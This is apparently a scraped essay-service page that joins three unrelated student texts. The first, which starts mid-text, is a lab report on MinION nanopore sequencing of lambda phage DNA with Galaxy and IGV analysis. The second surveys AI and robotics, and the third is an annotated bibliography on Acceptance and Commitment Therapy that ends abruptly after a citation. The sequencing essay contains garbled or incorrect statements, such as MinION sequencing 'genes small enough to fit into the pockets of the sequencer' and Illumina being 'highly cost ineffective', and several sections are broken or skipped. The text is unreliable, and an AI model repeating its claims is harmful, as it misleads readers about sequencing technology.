The single stranded DNA strand or fragments are introduced into the nanopore by entering from the microscopic opening  and this DNA sample is then introduced in an insulating membrane between two compartments and is filled with saline solution and an electric potential is applied across it. To one of the compartment DNA strands or fragments are added and they are allowed to pass through the nanopore where they get captured by the electric field and threaded through the pore. The way in which the bases influence the electric field through the nanopore  are measured. These measured data can be decoded to retrieve the DNA sequence.

https://f1000research.com/articles/6-1083/v2

Two kinds of pores

a)      Biological pore

b)      Solid state pore

Charge and Structue of the Nanopore

“The structural property which makes the biological pore suitable for DNA sequencing is a constriction site at which the passing strand exerts the most influence on the electrical current”. The leng of the passage mostly determines  how many bases influes the electric potential. The number of bases that is “read” concurrently at a particular time. Thenumber of reads should be low to allow identification of electric current for each different combinations of bases and high to allow the overlap between some subsequent combination of bases. This develops advantage while basecalling to allow baes to read as many times it is possible.

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5770995/

To initiate the sequencing, the DNA strand first needs to move towards one side of the pore which is also named as cis-side. At this pore the electric field is captured and it is  threaded through the pore and comes out at the other pore called trans-side.

Here two forces are taken into consideration. Electrophoretic force is induced by positive electric field which is appied at the trans-side and attracts the negatively charged DNA and drags it in. The positive particles move to the opposite direction as the negative particles leave the cis-side.  The DNA strands gets strengthened by the formation of positively charged zone around the cis entrance of the pore. The electro-osmotic flow force is induced by ion flow and net water through the pore which is influenced by strand translocation.

Target molecules can be detected at very low concentrations.

Biomarkers or genes can be screened

At low cost analysis can be provided at a high speed.

As the nanopore sequencing is producing quick results it can be used as a powerful diagnostic tool for identifying infectious agents. The advantages in time taken for pathogen identification and read length is a necessary need in hospital environment.

Lambda phage DNA Sequencing with Minion Nanopore Technology

Minion is a sequencer used for sequencing genes which are small enough to fit into the pockets of the sequencer. It has been developed by Oxford Nanopore. Minions main goal is to read genetic bases in DNA in a real time using Nanopore Sequencing methodology. Minion Nanopore Sequencing uses a very basic principle, the strands of DNA or Nucleotide bases are driven into a nanopore electrophoretically.

Main Goal

The main goal of sequencing Lambda phage DNA using MinION nanopore sequencing is to explain that it can produce long reads that are accurate enough to enable them to be aligned back to their reference genomes.  This can be helpful in the real time to sequence any genome and can get results with more or less accuracy. Generally, the accuracy of the MinION sequencer is to ~93%. As it is portable, affordable and its data production at a great speed and its ability to produce long reads makes it to use in a real time environment.

High Seq Vs MinION

The difference between the Illumina seq and the Minion nanopore sequencing is that the Illumina is a second-generation DNA sequencer where it produces data using high throughput sequencing platform. It produces short reads which are highly accurate. The draw back of Illumina sequencer is that it is not portable, and it is highly cost ineffective. This cannot be used in a real time application. It needs a laboratory to run the sequencer, where as in MinION sequencing it produces very long reads up to few megabases. It is cost effective, portable as it is like a cell phone in size and can be used in real time applications for clinical diagnosis and pathogen surveillance. It doesn’t need any bend to prepare library.

The Illumina sequencer produces genome assembly at a low price but the ability to get long repeats from short reads is very limited. It is totally opposite in case of MinION where we can get the long reads for the expansion of repeated sequences.

Getting started with the Minion sequencer

In order to get started with the minion sequencer a computer is needed with good configuration, and the dummy flow cell is used to analyze the hardware and software setup by running a data exchange.

After checking whether the dummy flow cell is working or not then we have to open the MinKNOW GUI icon on the desktop and we have to establish a connection remotely.

We have to enter the flow cell ID and Sample ID which is used. We are now using a small viral genome called Lambda phage for sequencing and then we are comparing it with the reference.

In order to run the base calling which is also called MinION burn in we need to set up all the required reagents and materials.

Library preparation

Before the genetic sample to be loaded on to the sequencer the sample should undergo few processing steps. This is considered as Library preparation because we are breaking the long strand of DNA into library of DNA fragments along with special sequences on their ends.

Here we have used the ready-made kit for the preparation of the Library. For performing this MinION nanopore sequencing in a real time this ready-made kit is helpful as we cannot find laboratories to prepare the libraries in a real time.

https://nanoporetech.com/resource-centre/dna-extraction-and-library-preparation-rapid-genus-and-species-level-identification

Real time sequencing

With the library we have prepared we are now loading the sample into the MinION which is connected to the computer or laptop for sequencing. The prepared DNA is loaded into the flow cell. This sample after getting loaded flows over a membrane spotted with nanopores. We must make sure that there are no air bubbles flowing across the membrane. The electrical signatures of DNA bases are read with the help of electronics present within the flow cell. These electrical signatures of DNA bases are read when they pass through the pores in the flow cell.

We can visualize the status of how each pore is functioning. If there are more active pores in the flow cell it can easily be visualized. The data which is coming in can be visualized as soon as the sequencing is started. The results came out in the form of FASTQ files.

Now the results can be analyzed by using the Galaxy platform. IGV is used as a visualization software to visualize the reads generated by the Sequencer.

Below are the steps performed to analyze the Minion nanopore sequencer output files.

https://nanoporetech.com/how-it-works

a)      Map the raw sequence reads provided to you (use 5 fastQ files) to Lambda DNA reference sequence.

Galaxy platform is used for the analysis of the output files obtained as a result of MinION nanopore sequencing. It is an open source platform where we can analyze data related to biomedical researches.  Its aim is to provide knowledge on computational biology to scientists and researchers who do not have any computational knowledge. It performs all the tasks necessary to create a bioinformatics workflow.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

Here we are using Galaxy platform for the analysis of raw sequence reads known as fastQ files generated as a result of the MinION sequencing. Analysis of this fastQ files involves mapping of the these raw sequence reads to the Lambda reference sequence which is downloaded from NCBI Genbank (Nucleotide) in a FASTA format. Accession number for Enterobacteria Phage Lambda, complete genome (NC_001416.1)

Input Data

In this we are uploading the FASTQ files which are obtained as a result of Lambda phage sequencing. The reference file is also uploaded along with the output files to check whether the interpretation is correct or not.

Figure 2 Fastq and reference files are uloaded into the galaxy platform

Custom reference Genome

It is a genome with reference that has sequence of nucleotide od scaffold,transcript, chromosomes of a species indicating a build or genome. The reference genome in FASTA format is represented automatically from the file uploaded earlier . In oder to assign our reference genome   I am specifying the build name as Lambda_Enterobacteria and build key as Lambda_Reference by selecting the reference dataset.

Figure 3 Custom Builds to specify the name of the build and the build key.

Concatenation of fastQ files

Concatenation of datasets is done to link all the files of fastQ sequences to be placed in a single entry so that a single file can contain all the 5 raw sequence reads . By clicking on the option Text Manipulation tool it displays a lot of options in that Concatenate datasets tail to head(cat), here all the datasets are concatenated to form one dataset as a whole. While selecting the files for concatenation we need to make sure that we are selecting only the raw sequence fastQ files and not the reference genome file.

Figure 4 Concatenation of datasets from tail to head

The output file of the concatenate datasets from tail to head is shown below. It produces a large dataset on whole by combining all the 5 FASTQ files.

Concatenated file as a one large dataset.

Figure 5 Output page of the conatenated datsets

BWA MEM Mapping

The BWA MEM is an algorithm used for alignment of sequence reads. It is also used for the alignment of the alignment of query sequence against a reference genome. BWA (Burrows Wheeler Aligner a software used for the mapping sequence of low divergence against long reference genomes.   It performs chimeric alignment and supports paired end reads. It chooses between end to end and local alignments. It is vigorous  to sequencing errors and it is easily applicable to sequence lengths from few base pairs to some megabases.

In our context we are aligning the concatenated FASTQ file with the reference genome . It takes fastq files as input and gives the output file as BAM format. This BAM file is further used for various utilities.

Figure 6 Performig NGS mapping with BWA MEM for medium and long reads against the regerence genome.

The output file is generated as a result of two input files concatenated datsets file and reference file.The mapped reads are in BAM format.

Figure 7 Results of the Mapping

By clicking on this we can visualize the aligned sequence.

Figure 8 Final Mapped file to download the Bai and BAM datasets for further analysis.

Trackser is a visualization tool for large datasets . It is very interactive and very fast visualization browser.

Figure 9 Visualization of the files using Trackster

After clicking on the Trackster a new window pops up asking to visualize the dataset in a new track or in a already existing track. It is shown below.

Figure 10Window to select to view in new visualization track

Galaxy has a very good integrated visualizer in its platform which has some tools in it fot the self exploration of the data and dynamic filters are used for the understanding of analyzed data. In the visualization window we can vizualize the genomic readion from 0 to 48,501. For the more specific selection of genomic region we can specify the chromosomal location . To be more specific we can give the starting and ending numbers of the chromosome region. By clicking to visualize the dataset in a new visualization track we have to specify the name of the browser and reference genome build.

Figure 11 Naming the Browser name for the new visualization window.

Visualization

Figure 12 The aligned sequences is visualized

Workflow

The worlflow of the above process is listed step by step in the work flow window. It contains the list of every single step we used to run the data. After extracting the workflow the workflow can be named as follows Lambda DNA . This naming will help in extracing the workflow from history and we can edit it whenever it is necessary.

Figure 13 The Workflow of the above applied steps

Overall Work Flow

Overall workflow of thisproject with the active steps are shown below in the form of flow chart.

Figure 14 Workflow Canvas of the Lambda DNA reference sequence

Figure 15 Login for my Galaxy platform

Integrative Genomics Viewer (IGV)

It is a large interactive exploration tool for high performance visualization. IGV is a light weight visualization tool which enables integrated genomics datasets. It supports array based , next generation sequecing , genomic annotations, mutations, copy number and methylation. Efficient file formats such as multi resolution files are used by IGV for the real time analysis of large datasets. In this data can be loaded from the remote sources or from local sources.

Visualization of diverse data types across many samples and its correlation of these integrated datasets with clinical and phenotypic variables are supported by IGV. We can easily define the sample annotations and link them with data tracks with the help of tab delimited format.

Here we are using IGV to visualize the mapped reads obtained from the Galaxy platform.

References

1.       Integrative Genomics Viewer

James T. Robinson,1 Helga Thorvaldsdóttir,1 Wendy Winckler,1 Mitchell Guttman,1,2 Eric S. Lander,1,2,3Gad Getz,1 and Jill P. Mesirov1

Oxford Nanopore MinION Sequencing and Genome Assembly HengyunLu1aFrancescaGiordano2bZeminNing2c National Centre of Gene Research, Chinese Academy of Sciences, Shanghai 200233, China, The Wellcome Trust Sanger Institute, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SA, UK. Received 9 March 2016, Revised 7 May 2016, Accepted 31 May 2016, Available online 17 September 2016. Handled by Jun Yu.

## Artificial Intelligence and Robotics Applications

I. Introduction
Artificial intelligence (AI) is the intelligence of machines and the branch of computer science that aims to create it. Textbooks define the field as “the study and design of intelligent agents,”[1] where an intelligent agent is a system that perceives its environment and takes actions that maximize its chances of success.[2] John McCarthy, who coined the term in 1956,[3] defines it as “the science and engineering of making intelligent machines. The field was founded on the claim that a central property of humans, intelligence-the sapience of Homo sapiens-can be so precisely described that it can be simulated by a machine. This raises philosophical issues about the nature of the mind and limits of scientific hubris, issues which have been addressed by myth, fiction and philosophy since antiquity.[6] Artificial intelligence has been the subject of optimism,[7]but has also suffered setbacks[8] and, today, has become an essential part of the technology industry, providing the heavy lifting for many of the most difficult problems in computer science. AI research is highly technical and specialized, deeply divided into subfields that often fail to communicate with each other.[10] Subfields have grown up around particular institutions, the work of individual researchers, the solution of specific problems, longstanding differences of opinion about how AI should be done and the application of widely differing tools. The central problems of AI include such traits as reasoning, knowledge, planning, learning, communication, perception and the ability to move and manipulate objects.[11] General intelligence (or “strong AI”) is still a long-term goal of (some) research.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

AI plays a major role in the field of robotics. The word robot can refer to both physical robots and virtual software agents, but the latter are usually referred to as bots.[3] There is no consensus on which machines qualify as robots, but there is general agreement among experts and the public that robots tend to do some or all of the following: move around, operate a mechanical limb, sense and manipulate their environment, and exhibit intelligent behaviour, especially behaviour which mimics humans or other animals. There is conflict about whether the term can be applied to remotely operated devices, as the most common usage implies, or solely to devices which are controlled by their software without human intervention. In South Africa, robot is an informal and commonly used term for a set of traffic lights. It is difficult to compare numbers of robots in different countries, since there are different definitions of what a “robot” is.
The International Organization for Standardization gives a definition of robot in ISO 8373: “an automatically controlled, reprogrammable, multipurpose, manipulator programmable in three or more axes, which may be either fixed in place or mobile for use in industrial automation applications.”[5] This definition is used by the International Federation of Robotics, the European Robotics Research Network (EURON), and many national standards committees. The Robotics Institute of America (RIA) uses a broader definition: a robot is a “re-programmable multi-functional manipulator designed to move materials, parts, tools, or specialized devices through variable programmed motions for the performance of a variety of tasks.”[7] The RIA subdivides robots into four classes: devices that manipulate objects with manual control, automated devices that manipulate objects with predetermined cycles, programmable and servo-controlled robots with continuous point-to-point trajectories, and robots of this last type which also acquire information from the environment and move intelligently in response. There is no one definition of robot which satisfies everyone, and many people have their own.[8] For example, Joseph Engelberger, a pioneer in industrial robotics, once remarked: “I can’t define a robot, but I know one when I see one.”[9] According to Encyclopaedia Britannica, a robot is “any automatically operated machine that replaces human effort, though it may not resemble human beings in appearance or perform functions in a humanlike manner”.[10] Merriam-Webster describes a robot as a “machine that looks like a human being and performs various complex acts (as walking or talking) of a human being”, or a “device that automatically performs complicated often repetitive tasks”, or a “mechanism guided by automatic controls. Modern robots are usually used in tightly controlled environments such as on assembly lines because they have difficulty responding to unexpected interference. Because of this, most humans rarely encounter robots. However, domestic robots for cleaning and maintenance are increasingly common in and around homes in developed countries, particularly in Japan. Robots can also be found in the military.
II. HISTORY
Mechanical or “formal” reasoning has been developed by philosophers and mathematicians since antiquity. The study of logic led directly to the invention of the programmable digital electronic computer, based on the work of mathematician Alan Turing and others. Turing’s theory of computation suggested that a machine, by shuffling symbols as simple as “0” and “1”, could simulate any conceivable act of mathematical deduction.[23] This, along with recent discoveries in neurology, information theory and cybernetics, inspired a small group of researchers to begin to seriously consider the possibility of building an electronic brain.[24]
The field of AI research was founded at a conference on the campus of Dartmouth College in the summer of 1956.[25] The attendees, including John McCarthy, Marvin Minsky, Allen Newell and Herbert Simon, became the leaders of AI research for many decades.[26] They and their students wrote programs that were, to most people, simply astonishing:[27] computers were solving word problems in algebra, proving logical theorems and speaking English.[28] By the middle of the 1960s, research in the U.S. was heavily funded by the Department of Defense[29] and laboratories had been established around the world.[30] AI’s founders were profoundly optimistic about the future of the new field: Herbert Simon predicted that “machines will be capable, within twenty years, of doing any work a man can do”[31] and Marvin Minsky  agreed, writing that “within a generation … the problem of creating ‘artificial intelligence’ will substantially be solved”.[32]
In the early 1980s, AI research was revived by the commercial success of expert systems,[35] a form of AI program that simulated the knowledge and analytical skills of one or more human experts. By 1985 the market for AI had reached over a billion dollars. At the same time, Japan’s fifth generation computer project inspired the U.S and British governments to restore funding for academic research in the field.[36]
Stories of artificial helpers and companions and attempts to create them have a long history but fully autonomous machines only appeared in the 20th century. The first digitally operated and programmable robot, the Unimate, was installed in 1961 to lift hot pieces of metal from a die casting machine and stack them. Today, commercial and industrial robots are in widespread use performing jobs more cheaply or with greater accuracy and reliability than humans. They are also employed for jobs which are too dirty, dangerous or dull to be suitable for humans. Robots are widely used in manufacturing, assembly and packing, transport, earth and space exploration, surgery, weaponry, laboratory research, and mass production of consumer and industrial goods.[4] The word robot was introduced to the public by Czech writer Karel Čapek in his play R.U.R. (Rossum’s Universal Robots), published in 1920.[16] The play begins in a factory that makes artificial people called robots, but they are closer to the modern ideas of androids, creatures who can be mistaken for humans. They can plainly think for themselves, though they seem happy to serve. At issue is whether the robots are being exploited and the consequences of their treatment. However, Karel Čapek himself did not coin the word. He wrote a short letter in reference to anetymology in the Oxford English Dictionary in which he named his brother, the painter and writer Josef Čapek, as its actual originator.[16] In an article in the Czech journal Lidové noviny in 1933, he explained that he had originally wanted to call the creatures laboÅ™i (from Latin labor, work). However, he did not like the word, and sought advice from his brother Josef, who suggested “roboti”.
III. FIELDS OF ARTIFICIAL INTELLIGENCE
A. Combinatorial Search
Many problems in AI can be solved in theory by intelligently searching through many possible solutions:[96] Reasoning can be reduced to performing a search. For example, logical proof can be viewed as searching for a path that leads from premises to  conclusions, where each step is the application of an inference rule.[97] Planning algorithms search through trees of goals and sub goals, attempting to find a path to a target goal, a process called means-ends analysis.[98] Robotics algorithms for moving limbs and grasping objects use local searches in configuration space.[67] Many learning algorithms use search algorithms based on optimization. Simple exhaustive searches[99] are rarely sufficient for most real world problems: the search space (the number of places to search) quickly grows to astronomical numbers. The result is a search that is too slow or never completes. The solution, for many problems, is to use “heuristics” or “rules of thumb” that eliminate choices that are unlikely to lead to the goal (called “pruning the search tree”). Heuristics supply the program with a “best guess” for what path the solution lies on.[100]A very different kind of search came to prominence in the 1990s, based on the mathematical theory of optimization. For many problems, it is possible to begin the search with some form of a guess and then refine the guess incrementally until no more refinements can be made. These algorithms can be visualized as blind hill climbing: we begin the search at a random point on the landscape, and then, by jumps or steps, we keep moving our guess uphill, until we reach the top. Other optimization algorithms are simulated annealing, beam search and random optimization.[101]
Evolutionary computation uses a form of optimization search. For example, they may begin with a population of organisms (the guesses) and then allow them to mutate and recombine, selecting only the fittest to survive each generation (refining the guesses). Forms of evolutionary computation include swarm intelligence algorithms (such as ant colony or particle swarm optimization) and evolutionary algorithms
B. Neural Network
A neural network is an interconnected group of nodes, akin to the vast network of neurons in the human brain. The study of artificial neural networks[127] began in the decade before the field AI research was founded, in the work of Walter Pitts and Warren McCullough. Other important early researchers were Frank Rosenblatt, who invented the perception and Paulwerbos who developed the back propagation algorithm.[134]The main categories of networks are acyclic or feed forward neural networks (where the signal passes in only one direction) and recurrent neural networks (which allow feedback). Among the most popular feed forward networks are perceptions, multi-layer perceptions and radial basis networks.[135] Among recurrent networks, the most famous is the Hopfield net, a form of attractor network, which was first described by John Hopfield in 1982. Neural networks can be applied to the problem of intelligent control(for robotics) or learning, using such techniques as Hebbian learning and competitive learning.[137]Jeff Hawkins argues that research in neural networks has stalled because it has failed to model the essential properties of the neocortex, and has suggested a model (Hierarchical Temporal Memory) that is based on neurological research.
C. Approaches
There is no established unifying theory or paradigm that guides AI research. Researchers disagree about many issues.[76] A few of the most long standing questions that have remained unanswered are these: should artificial intelligence simulate natural intelligence, by studying psychology or neurology? Or is human biology as irrelevant to AI research as bird biology is to aeronautical engineering? Can intelligent behavior be described using simple, elegant principles (such as logic or optimization)? Or does it necessarily require solving a large number of completely unrelated problems?[78] Can intelligence be reproduced using high-level symbols, similar to words and ideas? Or does it require “sub-symbolic” processing?[79]
D. General Intelligence
Main articles: Strong AI and AI-complete Most researchers hope that their work will eventually be incorporated into a machine with general Intelligence (known as strong AI),combining all the skills above and exceeding human abilities at most or all of them.[12] A few believe that anthropomorphic features like artificial consciousness or an artificial brain may be required for such a project.[74] Eliezer Yudkowsky has argued for the importance of friendly artificial intelligence, to mitigate the risks of an uncontrolled intelligence explosion. The Singularity Institute for Artificial Intelligence is dedicated to creating such an AI. Many of the problems above are considered AI-complete: to solve one problem, you must solve them all. For example, even a straightforward, specific task like machine translation requires that the machine follow the author’s argument (reason), know what is being talked about (knowledge), and faithfully reproduce the author’s intention (social intelligence). Machine translation, therefore, is believed to be AI-complete: it may require strong AI to be done as well as humans can do it.[75]
E. Planning
Intelligent agents must be able to set goals and achieve them.[56] They need a way to visualize the future (they must have a representation of the state of the world and be able to make predictions about how their actions will change it) and be able to make choices that maximize the utility (or “value”) of the available choices.[57]In classical planning problems, the agent can assume that it is the only thing acting on the world and it can be certain what the consequences of its actions may be.[58] However, if this is not true, it must periodically check if the world matches its predictions and it must change its plan as this becomes necessary, requiring the agent to reason under uncertainty.[59]Multi-agent planning uses the cooperation and competition of many agents to achieve a given goal. Emergent behavior such as this is used bye volutionary algorithms and swarm intelligence.
F. Learning
Machine learning has been central to AI research from the beginning.[62] Unsupervised learning is the ability to find patterns in a stream of input. Supervised learning includes both classification and numerical  regression. Classification is used to determine what category something belongs in, after seeing a number of examples of things from several categories. Regression takes a set of numerical input/output examples and attempts to discover a continuous function that would generate the outputs from the inputs. In reinforcement learning[63] the agent is rewarded for good responses and punished for bad ones. These can be analyzed in terms of decision theory, using concepts like utility. The mathematical analysis of machine learning algorithms and their performance is a branch of theoretical computer science known as computational learning theory
G. Motion And Manipulation
The field of robotics[66] is closely related to AI. Intelligence is required for robots to be able to handle such tasks as object manipulation[67] and navigation, with sub-problems of localization (knowing where you are), mapping (learning what is around you) and motion planning (figuring out how to get there).
H. Knowledge Representation
Knowledge representation and knowledge engineering are central to AI research. Many of the problems machines are expected to solve will require extensive knowledge about the world. Among the things that AI needs to represent are: objects, properties, categories and relations between objects;[45] situations, events, states and time;[46] causes and effects;[47] knowledge about knowledge (what we know about what other people know); and many other, less well researched domains. A complete representation of “what exists” is an ontology (borrowing a word from traditional philosophy), of which the most general are called upper ontologies.
I. Natural Language Processing
Natural language processing[64] gives machines the ability to read and understand the languages that humans speak. Many researchers hope that a sufficiently powerful natural language processing system would be able to acquire knowledge on its own, by reading the existing text available over the internet. Some straightforward applications of natural language processing include information retrieval (or text mining) and machine translation.
IV. APPLICATIONS OF ROBOTS
Robotics has been of interest to mankind for over one hundred years. However our perception of robots has been influenced by the media and Hollywood.
One may ask what robotics is about? In my eyes, a robots’ characteristics change depending on the environment it operates in. Some of these are:
A. Outer Space
Manipulative arms that are controlled by a human are used to unload the docking bay of space shuttles to launch satellites or to construct a space station
B. The Intelligent Home
Automated systems can now monitor home security, environmental conditions and energy usage. Door and windows can be opened automatically and appliances such as lighting and air conditioning can be pre programmed to activate. This assists occupants irrespective of their state of mobility.
C. Exploration
Robots can visit environments that are harmful to humans. An example is monitoring the environment inside a volcano or exploring our deepest oceans. NASA has used robotic probes for planetary exploration since the early sixties.
D. Military Robots
Airborne robot drones are used for surveillance in today’s modern army. In the future automated aircraft and vehicles could be used to carry fuel and ammunition or clear minefields
E. Farms
Automated harvesters can cut and gather crops. Robotic dairies are available allowing operators to feed and milk their cows remotely.
F. The Car Industry
Robotic arms that are able to perform multiple tasks are used in the car manufacturing process. They perform tasks such as welding, cutting, lifting, sorting and bending. Similar applications but on a smaller scale are now being planned for the food processing industry in particular the trimming, cutting and processing of various meats such as fish, lamb, beef.
G. Hospitals
Under development is a robotic suit that will enable nurses to lift patients without damaging their backs. Scientists in Japan have developed a power-assisted suit which will give nurses the extra muscle they need to lift their patients- and avoid back injuries. The suit was designed by Keijiro Yamamoto, a professor in the welfare-systems engineering department at Kanagawa Institute of Technology outside Tokyo. It will allow caregivers to easily lift bed-ridden patients on and off beds. In its current state the suit has an aluminium exoskeleton and a tangle of wires and compressed-air lines trailing from it. Its advantage lies in the huge impact it could have for nurses. In Japan, the population aged 14 and under has declined 7% over the past five years to 18.3 million this year. Providing care for a growing elderly generation poses a major challenge to the government.
Robotics may be the solution. Research institutions and companies in Japan have been trying to create robotic nurses to substitute for humans. Yamamoto has taken another approach and has decided to create a device designed to help human nurses.
In tests, a nurse weighing 64 kilograms was able to lift and carry a patient weighing 70 kilograms. The suit is attached to the wearer’s back with straps and belts. Sensors are placed on the wearer’s muscles to measure strength. These send the data back to a microcomputer, which calculates how much more power is needed to complete the lift effortlessly.
The computer, in turn, powers a chain of actuators – or inflatable cuffs – that are attached to the suit and worn under the elbows, lower back and knees. As the wearer lifts a patient, compressed air is pushed into the cuffs, applying extra force to the arms, back and legs. The degree of air pressure is automatically adjusted according to how much the muscles are flexed. A distinct advantage of this system is that it assists the wearers knees, being only one of its kind to do so.
A number of hurdles are still faced by Yamamoto. The suit is unwieldy, the wearer can’t climb stairs and turning is awkward. The design weight of the suit should be less than 10 kilograms for comfortable use. The latest prototype weighs 15 kilograms. Making it lighter is technically possible by using smaller and lighter actuators. The prototype has cost less than ¥1 million (\$8,400) to develop. But earlier versions developed by Yamamoto over the past 10 years cost upwards of ¥20 million in government development grants.
H. Disaster Areas
Surveillance robots fitted with advanced sensing and imaging equipment can operate in hazardous environments such as urban setting damaged by earthquakes by scanning walls, floors and ceilings for structural integrity.
I. Entertainment
Interactive robots that exhibit behaviours and learning ability. SONY has one such robot which moves freely, plays with a ball and can respond to verbal instructions.
Robots have the ability to consistently produce high-quality products and to precisely perform tasks. Since they never tire and can work nonstop without breaks, robots are able to produce more quality goods or execute commands quicker than their human counterparts
B. Management Benefits
Robot employees never call in sick, never waste time and rarely require preparation time before working. With robots, a manager never has to worry about high employee turnover or unfilled positions
C. Employee Benefits
Robots can do the work that no one else wants to do-the mundane, dangerous, and repetitive jobs. Common Misconception about Robots : Introducing robots into a work environment does not necessarily mean the elimination of jobs. With the addition of robots comes the need for highly-skilled, human workers.
D. Consumer Benefits
Robots produce high quality goods Since robots produce so many quality goods in a shorter amount of time than humans, we reap the benefits of cheaper goods. Since the products are produced more quickly, this significantly reduces the amount of time that we are forced to wait for products to come to the marketplace
VI. SHORTCOMINGS
Fears and concerns about robots have been repeatedly expressed in a wide range of books and films. A common theme is the development of a master race of conscious and highly intelligent robots, motivated to take over or destroy the human race. (See The Terminator, Runaway, Blade Runner, Robocop, the Replicators in Stargate, the Cylons in Battlestar Galactica, The Matrix, THX-1138, and I, Robot.) Some fictional robots are programmed to kill and destroy; others gain superhuman intelligence and abilities by upgrading their own software and hardware. Examples of popular media where the robot becomes evil are 2001: A Space Odyssey, Red Planet, … Another common theme is the reaction, sometimes called the “uncanny valley”, of unease and even revulsion at the sight of robots that mimic humans too closely.[99] Frankenstein (1818), often called the first science fiction novel, has become synonymous with the theme of a robot or monster advancing beyond its creator. In the TV show, Futurama, the robots are portrayed as humanoid figures that live alongside humans, not as robotic butlers. They still work in industry, but these robots carry out daily lives.
Manuel De Landa has noted that “smart missiles” and autonomous bombs equipped with artificial perception can be considered robots, and they make some of their decisions autonomously. He believes this represents an important and dangerous trend in which humans are handing over important decisions to machines.[100]
Marauding robots may have entertainment value, but unsafe use of robots constitutes an actual danger. A heavy industrial robot with powerful actuators and unpredictably complex behavior can cause harm, for instance by stepping on a human’s foot or falling on a human. Most industrial robots operate inside a security fence which separates them from human workers, but not all. Two robot-caused deaths are those of Robert Williams and Kenji Urada. Robert Williams was struck by a robotic arm at a casting plant in Flat Rock, Michigan on January 25, 1979.[101] 37-year-old Kenji Urada, a Japanese factory worker, was killed in 1981; Urada was performing routine maintenance on the robot, but neglected to shut it down properly, and was accidentally pushed into a grinding machine.
VII. CONCLUSIONS
If the current developments are to be believed then the next wave of robots will have a supernatural resemblance with humans with the help of AI. The Indian automotive industry has finally awaken to the fact that robotics is not just about saving labour, but it also helps companies significantly to step up productivity and quality to meet the demands of international competition. Industrial robots can be involved in production industry because of its less time consumption, accuracy of work, and less labour. As globalization accelerates, robotics is increasingly vital to maintain the health of the industrial sector and keep manufacturing jobs at home. ”Now more than ever, the need to stay competitive is a driver for investing in robotics. Companies in all over the world are often faced with difficult choices: Do they send their manufacturing to low-cost producers overseas? Or, do they invest in robotics to continue making products here?” We conclude that more companies are realizing that robotics is the better option.

## Applications and Adaptations of Acceptance and Commitment Therapy (ACT) for Adolescents.

Blackledge, J., & Hayes, S. (2006). Using Acceptance and Commitment Training in the Support of Parents of Children diagnosed with Autism. Child and Family Behavior Therapy, 28(1), 1-18. doi: 10.1300/J019v28n01_01

Blackledge and Hayes (2006) investigated the effectiveness of a 2-day (14 hour) group format Acceptance and Commitment Therapy (ACT) intervention on the depression and distress of parents and caregivers of children with a autism diagnosis. The intervention was presented as a supportive and collective experience to assist parents and caregivers with better methods to cope with the difficulties and stress associated with supporting an autistic child. The authors aimed to evaluate the effectiveness of the ACT intervention with participants being recruited from 3 differing geographical regions in an intent to attain the common mainstream of parents in this particular situation. The study consisted of self-report instruments measuring therapeutic mechanisms of change and outcomes in depression, distress, and perceived control over their children’s behaviour. ACT-specific concepts were measured using the Acceptance and Action Questionnaire-9-item version (AAQ), which measures experiential avoidance, cognitive fusion, and complications in acting in the presence of adverse private events, and the Automatic Thoughts Questionnaire (ATQ-B), which measures the frequency of automatic negative accounts an individual has. The psychological needs of parents and caregivers of children diagnosed with autism is largely ignored. The focus of this study was on the decrease of distress and depression levels of these parents post-treatment and attempted to reassess the treatment gains 3 months after the completion of treatment. Limitations of this study included the small trial which involved only 20 participants, thus the study could not control for social support or expectancy. Furthermore, the process measures utilised in the study were not optimal, in addition to many of the participants not being highly distressed despite the intervention analysing the effects of this training on the levels of distress experienced. Due to the very general processes measures that were applied in the study it was unknown whether there was improvement from parents and caregivers in accepting difficult emotions and defusing from aversive cognitions. The study found that the use of ACT with parents and caregivers of children diagnosed with autism is effective in reducing the processes measures of experiential avoidance and cognitive fusion. The study additionally provides evidence that ACT can be effective in this population in adjusting to the difficulties associated with raising their children. Given that parents and caregivers often have high rates of depressive and anxiety disorders, this study is beneficial in looking at the support and care needed to raise autistic children and provides evidence that ACT may improve the psychological situation faced by these parents and caregivers (Breslaud & Davis, 1986). Results from this study indicate that the creation of an ACT family-based treatment for both parents and autistic children may be of value.

Murrell, A., & Scherbarth, A. (2011). State of the research & literature address: ACT with children, adolescents and parents. The International Journal of Behavioral Consultation and Therapy, 7(1), 15-22. doi: 10.1037/h0101005

Murrell and Scherbarth (2011) present a review of empirical and theoretical work on the use of Acceptance and Commitment Therapy (ACT) with youth and parents. Personal communication, online databases, and ACT-related websites were utilised to accumulate information regarding published and unpublished work. The authors aimed to summarise the state of ACT work that has been administered with children, adolescents, and their parents and to provide further questions and recommendations for ACT researchers. Published articles were identified using the PsychInfo database, with search terms including ‘ACT’, or ‘Acceptance’, and ‘child’, ‘adolesc’, or ‘parent’. Unpublished work was found in published articles or the research labs link or directly from important researchers in the domain of ACT with youth. The review only included articles that were written in English. The research, which involves ACT in the population of youth and parents, focuses on individual problems in children and adolescents, such as anxiety disorders and chronic pain, and parents, such as impaired parenting. Limitations involve the issue of treatment measures, which should reflect the acceptance and valuing components of ACT and not solely traditional measures of symptomatology. Additionally, although many treatment protocols included measures of functionality, some did not, and it seems that there is no standardized measures of valuing for children. Furthermore, most study designs were case studies and uncontrolled group-design studies, however, when comparing gold-standard for treatment studies larger samples and controlled designs are crucial. In support of previous research, it was concluded that ACT appears beneficial in parents in regards to aiding therapeutic progress in youth. This review adds to the limited literature available on ACT work conducted with children, adolescents, and their parents. Additionally, the authors provide recommendations that will be valuable to future researchers and the community of ACT.

Swain, J., Hancock, K., Dixon, A., Koo, S., & Bowan, J. (2013). Acceptance and Commitment Therapy for anxious children and adolescents: Study protocol for a randomised controlled trial. Trials, 14(140),  1-12. doi:  10.1186/1745-6215-14-140.

